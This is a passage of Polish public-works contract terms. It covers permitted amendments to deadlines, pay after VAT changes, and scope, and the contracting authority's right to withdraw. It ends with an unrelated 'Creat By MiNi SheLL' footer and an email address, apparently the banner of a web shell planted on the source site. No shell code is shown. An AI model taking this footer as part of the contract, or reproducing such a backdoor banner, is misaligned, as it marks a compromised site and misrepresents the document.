d)konieczności wykonania robót zamiennych, dodatkowych i innych niezbędnych do zakończenia przedmiotu umowy, w tym wynikających z korekty dokumentacji projektowej.  
e)zaistnienia okoliczności utrudniających lub uniemożliwiających  terminowe zakończenie  przedmiotu umowy takich jak: warunki atmosferyczne, archeologiczne, geologiczne, hydrauliczne, kolizje z sieciami infrastruktury technicznej  

2)zmiana wynagrodzenia
a)w przypadku zmiany stawki podatku VAT w okresie realizacji zamówienia - dotyczy  części wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
b)w przypadku zmiany zakresu rzeczowo - finansowego wskutek zlecenia przez Zamawiającego wykonania  robót koniecznych, zamiennych i dodatkowych.  

3)Inne zmiany: 
a)rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenie terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę,
b)Zmiana zakresu rzeczowo - finansowego zamówienia w przypadku wystąpienia obiektywnych okoliczności skutkujących koniecznością zmiany w trakcie realizacji umowy zakresu rzeczowo - finansowego robót.

c)Zmiana zakresu części zamówienia powierzonej Podwykonawcom

d) W przypadku okoliczności wynikających ze zmiany przepisów obowiązujących przy współfinansowaniu projektu Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013.  (PROW)
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.

W razie zaistnienia istotnej zmiany okoliczności powodujacej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku, o którym mowa w poprzednim zdaniu, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com